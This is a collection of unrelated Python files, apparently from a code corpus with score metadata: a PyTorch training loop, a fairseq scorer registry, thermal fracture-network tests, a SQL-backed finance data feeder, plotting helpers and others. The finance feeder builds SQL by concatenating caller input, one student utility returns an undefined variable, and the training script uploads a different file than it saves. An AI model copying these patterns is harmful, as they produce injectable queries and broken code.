# in case we use cuda to train on gpu
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
preds = model(images)
loss = criterion(preds, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
train_correct += (preds_indices == labels).sum()
i += 1
if i % 100 == 0:
print(
f"Epoch: {e+1} / {epochs}"
f" - progress: {i} / {batch_count}"
f" - loss: {loss.data.mean()}"
)
for images, labels in validation_loader:
images = images.to(device)
labels = labels.to(device)
preds = model(images)
loss = criterion(preds, labels)
validation_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
validation_correct += (preds_indices == labels).sum()
train_accuracy = float(train_correct / (len(train_loader) * cfg.batch_size))
validation_accuracy = float(validation_correct / (len(validation_loader) * cfg.batch_size))
wandb.log({
"train_loss": train_loss,
"validation_loss": validation_loss,
"train_accuracy": train_accuracy,
"validation_accuracy": validation_accuracy,
})
train_losses.append(train_loss / len(train_loader))
validation_losses.append(validation_loss / len(validation_loader))
# plotting
plt.plot(list(range(1, len(train_losses) + 1)), train_losses, label="Training loss")
print("Train losses:", train_losses)
plt.plot(list(range(1, len(validation_losses) + 1)), validation_losses, label="Validation loss")
print("Validation losses:", validation_losses)
plt.xlabel("epoch")
plt.ylabel("loss")
plt.legend()
fig_path = "training_run.png"
plt.savefig(fig_path)
print(f"Saved training loss figure to {fig_path}")
model_path = "trained_model.pth"
torch.save(model.state_dict(), model_path)
print(f"Saved trained model to {model_path}")
storage_client = storage.Client()
bucket = storage_client.bucket("chess_predictor")
blob = bucket.blob("model_blob")
blob.upload_from_filename("outputs/model_0.pt")
if __name__ == "__main__":
train()
| 2.234375 | 2 |
fairseq/scoring/__init__.py | fairseq-FT/fairseq | 33 | 6930 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import os
from abc import ABC, abstractmethod
from fairseq import registry
from omegaconf import DictConfig
class BaseScorer(ABC):
def __init__(self, cfg):
self.cfg = cfg
self.ref = []
self.pred = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.pred.append(pred)
@abstractmethod
def score(self) -> float:
pass
@abstractmethod
def result_string(self) -> str:
pass
_build_scorer, register_scorer, SCORER_REGISTRY, _ = registry.setup_registry(
"--scoring", default="bleu"
)
def build_scorer(choice, tgt_dict):
if isinstance(choice, DictConfig):
choice = choice._name
if choice == "bleu":
from fairseq.scoring import bleu
return bleu.Scorer(
bleu.BleuConfig(pad=tgt_dict.pad(), eos=tgt_dict.eos(), unk=tgt_dict.unk())
)
return _build_scorer(choice)
# automatically import any Python files in the current directory
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith(".py") and not file.startswith("_"):
module = file[: file.find(".py")]
importlib.import_module("fairseq.scoring." + module)
| 2.234375 | 2 |
dfn/tests/test_FractureNetworkThermal.py | richardhaslam/discrete-fracture-network | 1 | 6931 | import copy
import unittest
import networkx as nx
import numpy as np
from scipy.special import erf
from dfn import Fluid, FractureNetworkThermal
class TestFractureNetworkThermal(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFractureNetworkThermal, self).__init__(*args, **kwargs)
# fluid properties
cp_w = 4300.0
rho_w = 1000.0
mu_w = 1E-3
self.fluid = Fluid(density=rho_w, viscosity=mu_w, heat_capacity=cp_w)
# reservoir properties
k_r = 2.9
cp_r = 1050.0
rho_r = 2700.0
alpha_r = k_r / (rho_r * cp_r)
# first network
conn_1 = [(0, 1), (1, 2), (1, 3), (2, 4), (3, 4), (4, 5)]
L_1 = [100, 500, 500, 500, 500, 100]
H_1 = [500, 500, 500, 500, 500, 500]
w_1 = [1E-3, 1E-3, 1E-3, 1E-3, 1E-3, 1E-3]
self.network_1 = FractureNetworkThermal(conn_1, L_1, H_1, w_1, k_r,
alpha_r)
# second network
conn_2 = [(0, 1), (1, 2), (2, 3), (1, 4), (2, 5), (3, 6), (4, 5),
(5, 6), (4, 7), (5, 8), (6, 9), (7, 8), (8, 9), (9, 10)]
L_2 = 250 * np.ones(len(conn_2))
L_2[0] = 100
L_2[-1] = 100
H_2 = 500 * np.ones(len(conn_2))
w_2 = 1E-3 * np.ones(len(conn_2))
self.network_2 = FractureNetworkThermal(conn_2, L_2, H_2, w_2, k_r,
alpha_r)
def copy_networks(self):
"""Return a copy of the fracture networks."""
return copy.copy(self.network_1), copy.copy(self.network_2)
def networks_with_flow(self):
"""Return networks with the mass flow calculated."""
network_1, network_2 = self.copy_networks()
P_0 = 0.0
m_inj = 50.0
network_1.calculate_flow(self.fluid, {0: P_0}, {5: -m_inj})
network_2.calculate_flow(self.fluid, {0: P_0}, {10: -m_inj})
return network_1, network_2
def reverse_nodes(self, network, segments):
"""Reverse the node order for given segments."""
conn = network.connectivity
for seg in segments:
inlet, outlet = conn[seg]
conn[seg, :] = outlet, inlet
network.connectivity = conn
return network
def test_no_mass_flow(self):
"""Test if TypeError is raised for networks without flow calculated."""
with self.assertRaises(TypeError):
self.network_1._check_if_calculated()
with self.assertRaises(TypeError):
self.network_2._check_if_calculated()
def test_neg_mass_flow(self):
"""Test if valueError is raised for networks with negative flow."""
network_1, network_2 = self.networks_with_flow()
network_1 = self.reverse_nodes(network_1, [1])
network_2 = self.reverse_nodes(network_2, [1])
network_1.calculate_flow(self.fluid, {0: 0}, {5: -1.0})
network_2.calculate_flow(self.fluid, {0: 0}, {10: -1.0})
with self.assertRaises(ValueError):
network_1.calculate_temperature(self.fluid, 0, [0], [1])
with self.assertRaises(ValueError):
network_2.calculate_temperature(self.fluid, 0, [0], [1])
def test_construct_graph(self):
"""Test _construct_graph method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
# construct graph for network 1
G_1 = nx.MultiDiGraph()
edge_data_1 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(1, 3, {'index': 2}), (2, 4, {'index': 3}),
(3, 4, {'index': 4}), (4, 5, {'index': 5})]
G_1.add_edges_from(edge_data_1)
# construct graph for network 2
G_2 = nx.MultiDiGraph()
edge_data_2 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(2, 3, {'index': 2}), (1, 4, {'index': 3}),
(2, 5, {'index': 4}), (3, 6, {'index': 5}),
(4, 5, {'index': 6}), (5, 6, {'index': 7}),
(4, 7, {'index': 8}), (5, 8, {'index': 9}),
(6, 9, {'index': 10}), (7, 8, {'index': 11}),
(8, 9, {'index': 12}), (9, 10, {'index': 13})]
G_2.add_edges_from(edge_data_2)
# return True if graphs are the same
is_isomorphic_1 = nx.is_isomorphic(network_1.graph, G_1)
is_isomorphic_2 = nx.is_isomorphic(network_2.graph, G_2)
self.assertTrue(is_isomorphic_1)
self.assertTrue(is_isomorphic_2)
def test_find_injection_nodes(self):
"""Test _find_injection_nodes method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
self.assertEqual(network_1._find_injection_nodes(), [0])
self.assertEqual(network_2._find_injection_nodes(), [0])
def test_mass_contribution(self):
"""Test _mass_contribution method."""
network_1, network_2 = self.networks_with_flow()
chi_1 = network_1._mass_contribution()
chi_2 = network_2._mass_contribution()
# first network
for i in (0, 1, 2, 5):
self.assertAlmostEqual(chi_1[i], 1.0, 12)
self.assertAlmostEqual(chi_1[3] + chi_1[4], 1.0, 12)
# second network
for i in (0, 1, 2, 3, 8, 13):
self.assertAlmostEqual(chi_2[i], 1.0, 12)
for i, j in [(4, 6), (5, 7), (9, 11), (10, 12)]:
self.assertAlmostEqual(chi_2[i] + chi_2[j], 1.0, 12)
def test_find_paths(self):
"""Test find_paths method."""
# .find_paths method calls .construct_graph if needed. Manually call
# .construct_graph() on one network for testing both True and False
# conditions
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
path_1 = {(0, 1, 3), (0, 2, 4)}
path_2 = {(0, 1, 2, 5, 10), (0, 1, 4, 7, 10), (0, 3, 6, 7, 10),
(0, 3, 6, 9, 12), (0, 3, 8, 11, 12), (0, 1, 4, 9, 12)}
self.assertEqual(path_1, set(network_1.find_paths(0, 4)))
self.assertEqual(path_2, set(network_2.find_paths(0, 9)))
def test_calculate_temperature_inlet_segment(self):
"""Test calculate_temperature ability to handle the inlet segment."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
m_1 = network_1.mass_flow[0]
m_2 = network_2.mass_flow[0]
beta_1 = 2 * network_1.thermal_cond * network_1.thickness[0] / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness[0] / \
(m_2 * network_2.fluid.c_f)
xi_1 = beta_1 * z / (2 * np.sqrt(network_1.thermal_diff * t))
xi_2 = beta_2 * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_1 = erf(xi_1)
Theta_2 = erf(xi_2)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 0,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 0,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
def test_calculate_temperature(self):
"""Test calculate_temperature by constructing manual the equations."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
chi_1 = np.array([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])
chi_2 = np.ones(network_2.n_segments)
chi_2[4:8] = 0.5
chi_2[9:13] = 0.5
m_1 = network_1.mass_flow
m_2 = network_2.mass_flow
beta_1 = 2 * network_1.thermal_cond * network_1.thickness / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness / \
(m_2 * network_2.fluid.c_f)
xi_1 = np.einsum('i,jk->ijk', beta_1 * network_1.length,
1 / (2 * np.sqrt(network_1.thermal_diff * t)))
xi_2 = np.einsum('i,jk->ijk', beta_2 * network_2.length,
1 / (2 * np.sqrt(network_2.thermal_diff * t)))
a = xi_1[[0, 2, 4], :, :].sum(axis=0)
b = xi_1[[0, 1, 3], :, :].sum(axis=0)
xi_seg = beta_1[-1] * z / (2 * np.sqrt(network_1.thermal_diff * t))
Theta_1 = chi_1[0] * chi_1[2] * chi_1[4] * erf(a + xi_seg) + \
chi_1[0] * chi_1[1] * chi_1[3] * erf(b + xi_seg)
a = xi_2[[0, 1, 2, 5, 10], :, :].sum(axis=0)
b = xi_2[[0, 1, 4, 7, 10], :, :].sum(axis=0)
c = xi_2[[0, 3, 6, 7, 10], :, :].sum(axis=0)
d = xi_2[[0, 3, 6, 9, 12], :, :].sum(axis=0)
e = xi_2[[0, 3, 8, 11, 12], :, :].sum(axis=0)
f = xi_2[[0, 1, 4, 9, 12], :, :].sum(axis=0)
C_1 = chi_2[0] * chi_2[1] * chi_2[2] * chi_2[5] * chi_2[10]
C_2 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[7] * chi_2[10]
C_3 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[7] * chi_2[10]
C_4 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[9] * chi_2[12]
C_5 = chi_2[0] * chi_2[3] * chi_2[8] * chi_2[11] * chi_2[12]
C_6 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[9] * chi_2[12]
xi_seg = beta_2[-1] * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_2 = C_1 * erf(a + xi_seg) + C_2 * erf(b + xi_seg) + \
C_3 * erf(c + xi_seg) + C_4 * erf(d + xi_seg) + \
C_5 * erf(e + xi_seg) + C_6 * erf(f + xi_seg)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 5,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 13,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
if __name__ == '__main__':
unittest.main()
| 2.390625 | 2 |
dataapi/AWS/getawsdata.py | gusamarante/Quantequim | 296 | 6932 | """
Author: <NAME>
"""
import numpy as np
import pandas as pd
from datetime import datetime
class TrackerFeeder(object):
"""
Feeder for the trackers of the FinanceHub database.
"""
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, fh_ticker):
"""
grabs trackers from the FH database
:param fh_ticker: str or list with the tickers from the database trackers
:return: pandas DataFrame with tickers on the columns
"""
assert type(fh_ticker) is str or type(fh_ticker) is list or type(fh_ticker) is dict, \
"'tickers' must be a string, list or dict"
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers" WHERE '
if type(fh_ticker) is str:
sql_query = sql_query + "fh_ticker IN ('" + fh_ticker + "')"
elif type(fh_ticker) is list:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(fh_ticker) + "')"
elif type(fh_ticker) is dict:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(list(fh_ticker.keys())) + "')"
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
if type(fh_ticker) is dict:
df = df.rename(fh_ticker, axis=1)
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
def fetch_metadata(self):
"""
Returns the full metadata table of the FH trackers, which is useful to do custom filters and look at what
is in the database.
:return: pandas Dataframe
"""
sql_query = 'SELECT * FROM "trackers_description"'
df = pd.read_sql(sql=sql_query, con=self.conn)
return df
def filter_fetch(self, filter_dict, ret='series'):
"""
Grabs the trackers from the FH database that satisfy the criteria given by 'filter_dict'.
:param filter_dict: dict. Keys must be column names from the metadata table. Values must be
either str or list of str
:param ret: If 'series', returns the a dataframe with the tracker series that staistfy the conditions.
If 'tickers', returns a list of the tickers that staistfy the conditions.
:return: list or pandas DataFrame
"""
assert type(filter_dict) is dict, "'filter_dict' must be a dict"
assert len(filter_dict) > 0, "'filter_dict' is empty"
assert ret.lower() in ['series', 'tickers'], "'ret' must be either 'series' or 'ticker'"
desc_query = 'SELECT fh_ticker FROM trackers_description WHERE '
for col in filter_dict.keys():
if type(filter_dict[col]) is list:
desc_query = desc_query + col + " IN ('" + "', '".join(filter_dict[col]) + "')"
else:
desc_query = desc_query + col + f" IN ('{filter_dict[col]}')"
desc_query = desc_query + ' and '
desc_query = desc_query[:-5]
df = pd.read_sql(sql=desc_query, con=self.conn)
tickers = df.values.flatten().tolist()
if ret == 'tickers':
return tickers
df = self.fetch(tickers)
return df
def filter_parameters(self):
"""
Grabs the possible columns and their respective unique values from the metadata table.
:return: dict. Keys are the column names, values are list of unique values of the column.
"""
df = self.fetch_metadata()
param_dict = {}
for col in df.columns:
param_dict[col] = df[col].unique().tolist()
return param_dict
def fetch_everything(self):
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers"'
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
class FocusFeeder(object):
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, index='ipca', frequency='yearly', prediction_scope=None,
dt_ini=None, dt_end=None):
"""
Grabs data from the data base and pivots the results into a dataframe. To assure consistency The function can
only take one index at a time and one frequency at a time. Only'prediction_scope' can be a list.
If no prediction scope is passed, all available prediction scopes are returned.
:param index: String containing the name of the index.
:param frequency: String. 'yearly', 'monthly' or 'quarterly' (availability depends on the index)
:param prediction_scope: string, float or list. Years that the forecasts are for.
:param dt_ini: string. Initial date for the series
:param dt_end: string. End date for the series
:return: pandas DataFrame with the pivoted data.
"""
# Error Checking
self._basic_assertions(index, frequency, prediction_scope)
# Handle formats
index, frequency, prediction_scope, dt_ini, dt_end, pivot \
= self._map_inputs(index, frequency, prediction_scope, dt_ini, dt_end)
# build sql query
sql_query = self._build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end)
# get data
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.drop_duplicates()
# pivoting
df = df.pivot(index='date', columns=pivot, values='value')
df.index = pd.to_datetime(df.index)
return df
def years_ahead(self, index='IPCA', years=1, dt_ini=None, dt_end=None):
"""
The metric atribute is set to 'mean' by default because further projections change smoothly
"""
# Error checking
self._basic_assertions_years_ahead(index, years)
# Handle formats
index, dt_ini, dt_end = self._map_inputs_years_ahead(index, dt_ini, dt_end)
# grabs the index for all available years for each date
df = self.fetch(index=index, frequency='yearly', prediction_scope=None,
dt_ini=dt_ini, dt_end=dt_end)
# creates the new dataframe
df_weighted = pd.DataFrame(index=df.index)
df_weighted[index + ' ' + str(years) + ' year ahead'] = np.nan
# days until year end
df_weighted['D2YE'] = ((df_weighted.index + pd.offsets.YearEnd()) -
pd.to_datetime(df_weighted.index.tolist())).days
for ind in df_weighted.index:
if ind.day == 31 and ind.month == 12:
df_weighted.loc[ind, 'D2YE'] = 0
# loops on each date
for date in df_weighted.index:
df_weighted.loc[date, index + ' ' + str(years) + ' year ahead'] = \
(df.loc[date, str(date.year + years - 1)] * df_weighted.loc[date, 'D2YE'] +
df.loc[date, str(date.year + years)] * (365 - df_weighted.loc[date, 'D2YE'])) / 365
df = df_weighted[[index + ' ' + str(years) + ' year ahead']].interpolate()
df.index = pd.to_datetime(df.index)
return df
@staticmethod
def _basic_assertions(index, frequency, prediction_scope):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert type(frequency) is str, 'frequency must be a string'
@staticmethod
def _map_inputs(index, frequency, prediction_scope, dt_ini, dt_end):
"""Handle formats of the inputs"""
# index
if type(index) is str:
index = index.lower()
elif type(index) is list:
index = [x.lower() for x in index]
# frequency
frequency = frequency.lower()
# prediction_scope
if type(prediction_scope) is str:
prediction_scope = prediction_scope.lower()
elif type(prediction_scope) is list:
prediction_scope = [str(x).lower() for x in prediction_scope]
elif prediction_scope is None:
prediction_scope = None
else:
prediction_scope = str(prediction_scope).lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
# pivot variable (while we have no metrics, its always the prediction scope)
pivot = 'prediction_scope'
return index, frequency, prediction_scope, dt_ini, dt_end, pivot
@staticmethod
def _build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end):
sql_query = 'SELECT DATE, VALUE, PREDICTION_SCOPE FROM "focus_survey" WHERE '
# index (must not be None)
if type(index) is str:
sql_query = sql_query + "lower(INDEX) IN ('" + index + "')"
elif type(index) is list:
sql_query = sql_query + "lower(INDEX) IN ('" + "', '".join(index) + "')"
# frequency
if type(frequency) is str:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + frequency + "')"
elif type(frequency) is list:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + "', '".join(frequency) + "')"
# prediction scope
if type(prediction_scope) is str:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + prediction_scope + "')"
elif type(prediction_scope) is list:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + "', '".join(prediction_scope) + "')"
sql_query = sql_query + " AND DATE BETWEEN '" + dt_ini + "' AND '" + dt_end + "'"
sql_query = sql_query + ' ORDER BY DATE;'
return sql_query
@staticmethod
def _basic_assertions_years_ahead(index, years):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert (type(years) is int) and (years <= 4), 'number of years must be an intger between 1 and 4'
@staticmethod
def _map_inputs_years_ahead(index, dt_ini, dt_end):
"""Handles the format of the inputs of the years_ahead method"""
index = index.lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
return index, dt_ini, dt_end
| 3.140625 | 3 |
assets/utils/config.py | mklew/quickstart-data-lake-qubole | 0 | 6933 | <reponame>mklew/quickstart-data-lake-qubole<filename>assets/utils/config.py
from configparser import ConfigParser
CONFIG_INT_KEYS = {
'hadoop_max_nodes_count',
'hadoop_ebs_volumes_count',
'hadoop_ebs_volume_size',
'spark_max_nodes_count',
'spark_ebs_volumes_count',
'spark_ebs_volume_size'
}
def read_config(config_path):
parser = ConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
for (config_key, config_value) in parser.items(section):
config[config_key] = int(config_value) if config_key in CONFIG_INT_KEYS else config_value
return config
| 2.421875 | 2 |
app/blueprints/admin_api/__init__.py | lvyaoo/api-demo | 0 | 6934 | <gh_stars>0
from flask import Blueprint
from .hooks import admin_auth
from ...api_utils import *
bp_admin_api = Blueprint('bp_admin_api', __name__)
bp_admin_api.register_error_handler(APIError, handle_api_error)
bp_admin_api.register_error_handler(500, handle_500_error)
bp_admin_api.register_error_handler(400, handle_400_error)
bp_admin_api.register_error_handler(401, handle_401_error)
bp_admin_api.register_error_handler(403, handle_403_error)
bp_admin_api.register_error_handler(404, handle_404_error)
bp_admin_api.before_request(before_api_request)
bp_admin_api.before_request(admin_auth)
from . import v_admin
| 1.796875 | 2 |
project/starter_code/student_utils.py | nihaagarwalla/nd320-c1-emr-data-starter | 0 | 6935 | <reponame>nihaagarwalla/nd320-c1-emr-data-starter<filename>project/starter_code/student_utils.py
import pandas as pd
import numpy as np
import os
import tensorflow as tf
import functools
####### STUDENTS FILL THIS OUT ######
#Question 3
def reduce_dimension_ndc(df, ndc_df):
'''
df: pandas dataframe, input dataset
ndc_df: pandas dataframe, drug code dataset used for mapping in generic names
return:
df: pandas dataframe, output dataframe with joined generic drug name
'''
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace("Hcl", "Hydrochloride")
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace(" And ", "-")
ndc_df["Non-proprietary Name"]= (ndc_df["Non-proprietary Name"].str.strip()).str.upper()
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("For Suspension, Extended Release", "For Suspension Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Powder, Metered", "Powder Metered")
# ndc_df["Dosage Form"]= (ndc_df["Dosage Form"].str.strip()).str.upper()
# ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]+"_"+ndc_df["Dosage Form"]
ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]
df_reduce_dimension = pd.merge(df, ndc_df, on=['ndc_code'], how='inner')
df_reduce_dimension['LABEL'] = 0
reduce_dim_df= df_reduce_dimension.drop(columns=['Proprietary Name', 'Non-proprietary Name', 'Dosage Form', 'Route Name', 'Company Name', 'Product Type'])
return reduce_dim_df
#Question 4
def select_first_encounter(df):
'''
df: pandas dataframe, dataframe with all encounters
return:
- first_encounter_df: pandas dataframe, dataframe with only the first encounter for a given patient
'''
first_encounter_df = df.sort_values('encounter_id').groupby('patient_nbr').first()
first_encounter_df = first_encounter_df.reset_index()
return first_encounter_df
#Question 6
def patient_dataset_splitter(df, key='patient_nbr'):
'''
df: pandas dataframe, input dataset that will be split
patient_key: string, column that is the patient id
return:
- train: pandas dataframe,
- validation: pandas dataframe,
- test: pandas dataframe,
'''
df = df.iloc[np.random.permutation(len(df))]
unique_values = df[key].unique()
total_values = len(unique_values)
train_size = round(total_values * (1 - 0.4 ))
train = df[df[key].isin(unique_values[:train_size])].reset_index(drop=True)
left_size = len(unique_values[train_size:])
validation_size = round(left_size*0.5)
validation = df[df[key].isin(unique_values[train_size:train_size+validation_size])].reset_index(drop=True)
test = df[df[key].isin(unique_values[validation_size+train_size:])].reset_index(drop=True)
return train, validation, test
#Question 7
def create_tf_categorical_feature_cols(categorical_col_list,
vocab_dir='./diabetes_vocab/'):
'''
categorical_col_list: list, categorical field list that will be transformed with TF feature column
vocab_dir: string, the path where the vocabulary text files are located
return:
output_tf_list: list of TF feature columns
'''
output_tf_list = []
for c in categorical_col_list:
vocab_file_path = os.path.join(vocab_dir, c + "_vocab.txt")
'''
Which TF function allows you to read from a text file and create a categorical feature
You can use a pattern like this below...
tf_categorical_feature_column = tf.feature_column.......
'''
tf_categorical_feature_column = tf.feature_column.categorical_column_with_vocabulary_file(
key=c, vocabulary_file = vocab_file_path, num_oov_buckets=1)
one_hot_origin_feature = tf.feature_column.indicator_column(tf_categorical_feature_column)
output_tf_list.append(one_hot_origin_feature)
return output_tf_list
#Question 8
def normalize_numeric_with_zscore(col, mean, std):
'''
This function can be used in conjunction with the tf feature column for normalization
'''
return (col - mean)/std
def create_tf_numeric_feature(col, MEAN, STD, default_value=0):
'''
col: string, input numerical column name
MEAN: the mean for the column in the training data
STD: the standard deviation for the column in the training data
default_value: the value that will be used for imputing the field
return:
tf_numeric_feature: tf feature column representation of the input field
'''
normalizer = functools.partial(normalize_numeric_with_zscore, mean=MEAN, std=STD)
tf_numeric_feature= tf.feature_column.numeric_column(
key=col, default_value = default_value, normalizer_fn=normalizer, dtype=tf.float64)
return tf_numeric_feature
#Question 9
def get_mean_std_from_preds(diabetes_yhat):
'''
diabetes_yhat: TF Probability prediction object
'''
m = diabetes_yhat.mean()
s = diabetes_yhat.stddev()
return m, s
# Question 10
def get_student_binary_prediction(df, col):
'''
df: pandas dataframe prediction output dataframe
col: str, probability mean prediction field
return:
student_binary_prediction: pandas dataframe converting input to flattened numpy array and binary labels
def convert_to_binary(df, pred_field, actual_field):
df['score'] = df[pred_field].apply(lambda x: 1 if x>=25 else 0 )
df['label_value'] = df[actual_field].apply(lambda x: 1 if x>=25 else 0)
return df
binary_df = convert_to_binary(model_output_df, 'pred', 'actual_value')
binary_df.head()
'''
return student_binary_prediction
| 3.28125 | 3 |
core_tools/utility/plotting/plot_1D.py | peendebak/core_tools | 0 | 6936 | <gh_stars>0
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import copy
from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data
from core_tools.utility.plotting.plot_general import _data_plotter
class plotter_1D(_data_plotter):
def __init__(self, plt_layout = plot_layout(), graph_setings = graph_settings_1D()):
self.plot_layout = plt_layout
self.local_data = np.empty([plt_layout.n_plots_y, plt_layout.n_plots_x], dtype = _1D_plot_single)
for i in range(self.local_data.size):
self.local_data.flat[i] = _1D_plot_single(graph_setings)
class _1D_plot_single:
def __init__(self, graph_settings):
self.settings = copy.copy(graph_settings) #default settings
self.data = []
self.x_lim = None
self.y_lim = None
def set_labels(self, xlabel, ylabel):
self.settings.xlabel = xlabel
self.settings.ylabel = ylabel
def set_range(self, x_range=None, y_range=None):
if x_range is not None:
self.x_lim = x_range
if y_range is not None:
self.y_lim = y_range
def add_data(self, x, y, xerr = None, yerr = None, label = None, settings = None, w=None, c=None, alpha=None):
if settings == None:
settings = copy.copy(self.settings)
else:
settings = copy.copy(settings)
if label is not None:
settings.label = label
if w is not None:
if 'l' not in w:
settings.linestyle = ''
if 'p' in w:
settings.marker = 'o'
if c is not None:
settings.color = c
if alpha is not None:
settings.alpha = alpha
self.data += [_1D_raw_plot_data(x,y, xerr, yerr, settings)]
def _render(self, ax, layout_settings, index, scaler = 1, figure=None):
ax.locator_params(axis='x', nbins=layout_settings.xbins)
ax.locator_params(axis='y', nbins=layout_settings.ybins)
ax.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.tick_params(direction='in', which='both', top=True, right=True)
if self.settings.xlog == True:
ax.set_xscale('log')
if self.settings.ylog == True:
ax.set_yscale('log')
if self.x_lim is not None:
ax.set_xlim(*self.x_lim)
if self.y_lim is not None:
ax.set_ylim(*self.y_lim)
labels = False
for i in range(len(self.data)):
data = self.data[i]
if data.x_error == None and data.y_error == None:
ax.plot(data.x_data, data.y_data, **data.settings.plot_settings_to_dict(i, scaler))
else:
pass
# ax.errorbar(a, c, yerr = b/10,ecolor='g',linewidth=1.2,elinewidth=0.7)
if data.settings.label is not None:
labels = True
if self.settings.xlabel is not None:
if layout_settings.share_x == False:
ax.set_xlabel(self.settings.xlabel)
elif index[0] == layout_settings.n_plots_x-1 :
ax.set_xlabel(self.settings.xlabel)
if self.settings.ylabel is not None:
if layout_settings.share_y == False:
ax.set_ylabel(self.settings.ylabel)
elif index[1] == 0 :
ax.set_ylabel(self.settings.ylabel)
if labels == True:
ax.legend()
# TODO add log scale support !!!
if __name__ == '__main__':
from colors import MATERIAL_COLOR, Red
# global settings
g = graph_settings_1D()
g.color = Red[::-1]
g.linewidth = 1
a = plotter_1D(graph_setings=g)
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'p', alpha = 1, c=Red[5])
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'l', alpha = 0.3, c=Red[5])
# a.plot()
a.save('test1D_single.svg')
